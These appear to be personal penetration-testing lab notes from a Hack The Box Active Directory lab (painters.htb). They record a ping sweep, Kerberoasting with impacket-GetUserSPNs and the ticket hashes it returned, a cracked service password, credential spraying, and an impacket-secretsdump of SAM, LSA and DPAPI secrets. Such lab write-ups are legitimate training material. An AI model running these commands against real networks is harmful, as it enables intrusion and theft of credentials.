Internal Enumeration

Ping Sweep

for i in {1..254};do (ping -c 1 192.168.110.$i | grep "bytes from" &);done

64 bytes from 192.168.110.1: icmp_seq=1 ttl=64 time=0.123 ms
64 bytes from 192.168.110.51: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 192.168.110.52: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.110.53: icmp_seq=1 ttl=128 time=0.227 ms
64 bytes from 192.168.110.54: icmp_seq=1 ttl=128 time=0.340 ms
64 bytes from 192.168.110.55: icmp_seq=1 ttl=128 time=0.289 ms

Crackmap exec

SMB         192.168.110.55  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:painters.htb) (signing:True) (SMBv1:False)


SMB         192.168.110.52  445    PNT-SVRSVC       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRSVC) (domain:painters.htb) (signing:False) (SMBv1:False)


SMB         192.168.110.53  445    PNT-SVRBPA       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRBPA) (domain:painters.htb) (signing:False) (SMBv1:False)


SMB         192.168.110.54  5985   NONE             [*] None (name:192.168.110.54) (domain:None)

No usernames are know yet.

Tried smb null authentication with crackmapexec

rpcclinet with login does give use some information

SRVSVC .52


PORT    STATE SERVICE       REASON  VERSION
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

SRVBPA .53

PORT    STATE SERVICE       REASON  VERSION
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Impacket with user creds

 
jay ~/Documents/zephyr took 421ms
➜ impacket-GetUserSPNs -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName   Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
---------------------  -------  --------  --------------------------  --------------------------  -----------
HTTP/svc.painters.htb  web_svc            2023-05-24 08:50:47.043365  2023-06-23 12:07:39.414564
HTTP/dc.painters.htb   blake              2023-06-23 08:34:15.398571  2023-06-23 13:21:25.195429  constrained

GetUserSPNs

We had the intial creds for the users riley so the next steps is to check NPUsers and Userspn.

 
➜ impacket-GetUserSPNs -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd' -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName   Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
---------------------  -------  --------  --------------------------  --------------------------  -----------
HTTP/svc.painters.htb  web_svc            2023-05-24 08:50:47.043365  2023-06-23 12:07:39.414564
HTTP/dc.painters.htb   blake              2023-06-23 08:34:15.398571  2023-06-23 13:21:25.195429  constrained
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$PAINTERS.HTB$painters.htb/web_svc*$ed75cc21807f3823378f1f6dc9fd2cb5$8300e8592cad7f5dcfdf524781caf661f4347e1ac3373779c7cdd4fed99cf9115def1b78c168fd458fb3ba2e9e4c58bee4b8f6a2c1a112be5d7c0b2fa4b7701a82d11c1ee602dc63064ae90f13e30179358758a529e8107c978d067471e30af02c32e1ccdfd18a61b79254772ddbd59256ec81a76d93464c015caaab0e8d6b435cace76ca8c2b21dc96bd023cb117774da078e1cf2968281c0fb4ba310152b0f6e5448c4f0cd514266251e14aac0b95a32234a6fded3f0df62ac31e336dfcd8de60eb661fbb643a3b68ed14b7fb67db3e21aa8e836f68aa860724009b9665e3f7a9b9911c6d37d73f31653ff73863b5ad5964a2e7a0ce09519543819aba5a3ca66b22c495823605f67712ed7dd06556c4071e94f01939d483d57fa25903ead4c8fb031c4edde282d001006a9e0d8275bf2a5a51e7fb189703d8b1caec74cfbce720aa283752d7e50675d350cd6c184d1bb9db1408d9f631ecf506d30ea9a7a9831fa167ce38a641810f15ed3cf53aa4122ef15c027039e68238ffa37432e903d92658510097b0f52be8bbe6b632bacfb213d71758255f75cb7743666a5bfde259883f170eca9b1cf721470b928e4495a811c4ff95dea1a0810505f3048bfec7e8f408e485fe5f15eedd0fe4287cdb12fd2de6faf7ed566cf91c0d3d2bfb2dc30b1e9eccadb9997e76ad58c42ad13331cd1472492db5ebed5e00bcdc7cd78604ed5d924c86d499d1ee76db36b070bc972d05d4035a81af5055a20f3a5baf813c276bf162b0c310dc55d795e9c182f723521df6f1cc16e730981da6e2ce7ee2f8ca0dc3b11cca73568e35c3fd55502d725541758cc3d4185d6498fcfda3da455504134e1ef7c2c562a87d6235daac7f26a4b932d19826a2151edff89ee2eec827b9c1290bf7b486d5d2b6f39c777af4efa2e8114b2f5537fd3fecf44a793bfb2d22458c967966f302453c459abd1cd331ca2119c405108b3df359373c4b64edca5eff650b62a96200c769e46e25ae6b8843fb21445fc43270923a57a1a5e68e3be35e849b28ed134220e11f02da2c4a84d7bb7ebb179139af9f8d5e6c3152c89638611c6b5e9061c6dcf3864915e1aab7cd31c14c3222cce186ca080a4eebeadda1f1e5795983edcb1ff73c788de181a96c28bde5836e72f4ab79f38a2cd13fe04cff3ddf6539b8b4cb02d528b9c636ada6adf124e88d5d81883bfe7bcf7475607e1262c731ae074bc299853195b48c81069010ef610df82d20b5f2bce539597a9062f28c3d577a42cd21728254f32f83bf545fe5c77daf53fe076909fbcda4e8334bdb13bd3faa1eea817d78ddc5fb9f0aa4d496ff8418fb6727600aa17248c59e336b7cb0406592e86e4329dfc11b1177168ca5cf2b45bbf76932b7e8d81b04f1ac8a00f8eae541efe756dd5c886a17d87c51e7be9b48c0b3b5e57d5094f4e93130513ee2d819e753cc8
$krb5tgs$23$*blake$PAINTERS.HTB$painters.htb/blake*$c987caba1da39a5480c3329b15a842bd$a8eda92caeb2daae8b416044a0c2ffc78f9768ed540097191ed3a91848c15925523ee0285175341d9ad3100e4f98e36ef82e49b129d530a71e10de51ed983d8ea2cfba1c74e5b5d775478b3db466f16aea602e37c4d7a7e42418b90b7f21849300f668a718f848dae617b31ada372231336e57d51b46ddcce9f8e1e17e6adc63b40560a4e03ce91a36763d8f72e8a0a8e67b12a0fc27d9999fcd1c7f6905b3afbed71cbd6c26996e8c19a32805063ee8ae6ae3c8d2aaa8ef527debe8bc2732264f6fa103986ea03170dc43441efa2b373b0895e7c8f46d8152506f6adbe664750100566633a34ed9088e531206c4a8df170c7791dcfbfa245d4f01b9234244e011ccb11865756b71c48dde9efd34a7e6520449bac13eeeb5e3b86bb74443cf854910bdb9773275ccedfc8071593d4cb8f41b6e6b38a510a233ab425e2ee62b692a8e703a23b3c0574f7c537dd8b2684635ce13b20b8ab3729662720322cd64213587ffc98b0d47d24722effaadb4d0568aeaf4b1673b5cd0e2ce3a111b0017c33b682bfd480a01cde49df05968d08c0d6cfcc66966c2c98bb7aed007c91cc02ff89341ce42a6e3b178cf5ae110f671ad3ec6abb81220651aa4af54388cce0847767b7402543e78d83aa7ce02cf6590297d09daca5349836d575ec4201432a80cdb29f469850f6cbff4a7f9eae4ee75711edc5b7fec0582e2b3fe2ba0826c23ececf446defcc7b4aca9e10ef65045d2d58a0c758092e3cfe55faa94dbbd7ea92fec582382cba511c365daeb0a5945e30bd30749084a18ca02c0e11f28a194927155dfb8468a0123bc743556b315517916c96a82c30fd10839228b9c4ae517b86f0659dd9559b534877d0aab04691dfa549fa15369bc1aa19745643da1f03ae757bca27fb6a7e1a62fa14293b89a169ab7b819092da61f2614396f6ce8ea76b1e3f04cc3d99c3e9988edfa8c8d2ec2b90b97ff4cf60028c688a9f479ef1eba4919e14fd10d6c15197fd6f21bd188b5b5fedf3d20ec7956b00b8090615309407ef501852b54a71b88998ffea8abdfbfb06a6906487f6cebba4b205d32caeb687d5821dd3ddec9d0035c86cea38f50e2a169e6a77eb699d36105b265fecc05bebe5f1d961c4db993775c0644a31e63453ad7f456cf82bd34ccb078b753291cc70b5efb29d2e3bc6ccd3c6a38cac1197a4b16fca3452939938b064de99937926a4a75d8d6e9586a9e3d07e4fee9a00f8cd33d172e6b65d61d32526e016066c2fca7fa714e8f4a9d741a8ca28c984a7e2360afcb998702ca0fef8a7bb1d2513b34855fce50a176cf96c77e11ae78a89118962b9e4c5a77a77140b2591e280efc225e515dcef5677f8bc23d8ec120e176aaa10b07398a0e28296c86b0992f1e77f02647389cb957065fb940d6ed4c54844eea82d64f1f4eea5d845c8544f242a0b1ae92b9302dfbc8b2a5727200

Cracked

$krb5tgs$23$*web_svc$PAINTERS.HTB$painters.htb/web_svc*$ed75cc21807f3823378f1f6dc9fd2cb5$8300e8592cad7f5dcfdf524781caf661f4347e1ac3373779c7cdd4fed99cf9115def1b78c168fd458fb3ba2e9e4c58bee4b8f6a2c1a112be5d7c0b2fa4b7701a82d11c1ee602dc63064ae90f13e30179358758a529e8107c978d067471e30af02c32e1ccdfd18a61b79254772ddbd59256ec81a76d93464c015caaab0e8d6b435cace76ca8c2b21dc96bd023cb117774da078e1cf2968281c0fb4ba310152b0f6e5448c4f0cd514266251e14aac0b95a32234a6fded3f0df62ac31e336dfcd8de60eb661fbb643a3b68ed14b7fb67db3e21aa8e836f68aa860724009b9665e3f7a9b9911c6d37d73f31653ff73863b5ad5964a2e7a0ce09519543819aba5a3ca66b22c495823605f67712ed7dd06556c4071e94f01939d483d57fa25903ead4c8fb031c4edde282d001006a9e0d8275bf2a5a51e7fb189703d8b1caec74cfbce720aa283752d7e50675d350cd6c184d1bb9db1408d9f631ecf506d30ea9a7a9831fa167ce38a641810f15ed3cf53aa4122ef15c027039e68238ffa37432e903d92658510097b0f52be8bbe6b632bacfb213d71758255f75cb7743666a5bfde259883f170eca9b1cf721470b928e4495a811c4ff95dea1a0810505f3048bfec7e8f408e485fe5f15eedd0fe4287cdb12fd2de6faf7ed566cf91c0d3d2bfb2dc30b1e9eccadb9997e76ad58c42ad13331cd1472492db5ebed5e00bcdc7cd78604ed5d924c86d499d1ee76db36b070bc972d05d4035a81af5055a20f3a5baf813c276bf162b0c310dc55d795e9c182f723521df6f1cc16e730981da6e2ce7ee2f8ca0dc3b11cca73568e35c3fd55502d725541758cc3d4185d6498fcfda3da455504134e1ef7c2c562a87d6235daac7f26a4b932d19826a2151edff89ee2eec827b9c1290bf7b486d5d2b6f39c777af4efa2e8114b2f5537fd3fecf44a793bfb2d22458c967966f302453c459abd1cd331ca2119c405108b3df359373c4b64edca5eff650b62a96200c769e46e25ae6b8843fb21445fc43270923a57a1a5e68e3be35e849b28ed134220e11f02da2c4a84d7bb7ebb179139af9f8d5e6c3152c89638611c6b5e9061c6dcf3864915e1aab7cd31c14c3222cce186ca080a4eebeadda1f1e5795983edcb1ff73c788de181a96c28bde5836e72f4ab79f38a2cd13fe04cff3ddf6539b8b4cb02d528b9c636ada6adf124e88d5d81883bfe7bcf7475607e1262c731ae074bc299853195b48c81069010ef610df82d20b5f2bce539597a9062f28c3d577a42cd21728254f32f83bf545fe5c77daf53fe076909fbcda4e8334bdb13bd3faa1eea817d78ddc5fb9f0aa4d496ff8418fb6727600aa17248c59e336b7cb0406592e86e4329dfc11b1177168ca5cf2b45bbf76932b7e8d81b04f1ac8a00f8eae541efe756dd5c886a17d87c51e7be9b48c0b3b5e57d5094f4e93130513ee2d819e753cc8:!QAZ1qaz

As soon as I find creds first thing is to check what machine it has access to.

➜ crackmapexec smb 192.168.110.0/24 -u 'web_svc' -p '!QAZ1qaz'
SMB         192.168.110.53  445    PNT-SVRBPA       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRBPA) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.52  445    PNT-SVRSVC       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRSVC) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.55  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:painters.htb) (signing:True) (SMBv1:False)
SMB         192.168.110.53  445    PNT-SVRBPA       [+] painters.htb\web_svc:!QAZ1qaz
SMB         192.168.110.52  445    PNT-SVRSVC       [+] painters.htb\web_svc:!QAZ1qaz (Pwn3d!)
SMB         192.168.110.55  445    DC               [+] painters.htb\web_svc:!QAZ1qaz

192.168.110.52 PNT-SVRSVC

 
 ~/Documents/zephyr  proxychains impacket-secretsdump 'painters.htb/web_svc:!QAZ1qaz@192.168.110.52'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.110.52:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb131ea5c8206a94e3d32119d035961a9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6ee87fa6593a4798fe651f5f5a4e663e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
James:1001:aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea:::
[*] Dumping cached domain logon information (domain/username:hash)
PAINTERS.HTB/Administrator:$DCC2$10240#Administrator#4f3d8c09f46360e84463d125c240c554
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PAINTERS\PNT-SVRSVC$:aes256-cts-hmac-sha1-96:a31b4a0de42a441e47dad46f283105a9eeaf023831336cf2b2933c2907a63c4a
PAINTERS\PNT-SVRSVC$:aes128-cts-hmac-sha1-96:0f5239792536fef683f21de1925b8ca4
PAINTERS\PNT-SVRSVC$:des-cbc-md5:9e89f79eb37f1fcb
PAINTERS\PNT-SVRSVC$:plain_password_hex:9c2295062db39652dd63b214344ce839af0ab487e64efc62923556fd6515e24f383f0f9a34006bae1f108446483b2e8c54a2d0bd08388b0e47dc12ad75a1859c45c917072bb683477e379108ff3131bcb52a4d4a2046c6c6f6252945e4b4e3c465a33a379854b4771e7cec30db10df8990bb0867c826c50d8d0646d4f817d70becbf98058e81d6a5b0f606263ea3c6495ff553bef55ee6fe109d03e5237ad0061f9ed7f0694d5c9be2a87379b82491871df259d251ff8a114d76961009551f53a5abaa1d51d7aa1d06d6e730a1a14797d33f71c3690eea3a00a09711f2053872d9dc815e3de06808e6b681c737cc9e33
PAINTERS\PNT-SVRSVC$:aad3b435b51404eeaad3b435b51404ee:c206d294c947cecc0e60955004ff96c5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6a28296d276ce0627958e99cfbcab0b54ff64355
dpapi_userkey:0xaf502a3258e233f29ce3ca24257f5877965bb87d
[*] NL$KM 
 0000   48 6D D8 24 3E D2 25 7B  96 58 D1 98 1B 7A E3 57   Hm.$>.%{.X...z.W
 0010   79 5B C9 17 D2 E7 E7 1A  F9 48 B4 9F D8 6D 1E A8   y[.......H...m..
 0020   F8 9B 47 1C B9 E3 B2 E1  CE FC 2C 92 48 01 39 25   ..G.......,.H.9%
 0030   A3 AA D4 45 A3 F4 A5 A8  4B 9B DE 1F 86 A7 5B B7   ...E....K.....[.
NL$KM:486dd8243ed2257b9658d1981b7ae357795bc917d2e7e71af948b49fd86d1ea8f89b471cb9e3b2e1cefc2c9248013925a3aad445a3f4a5a84b9bde1f86a75bb7
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Malleum Knowledge Base

Explorer

Internal Enumeration

Ping Sweep

Crackmap exec

No usernames are know yet.

SRVSVC .52

SRVBPA .53

Impacket with user creds

GetUserSPNs

Cracked

As soon as I find creds first thing is to check what machine it has access to.

Graph View

Table of Contents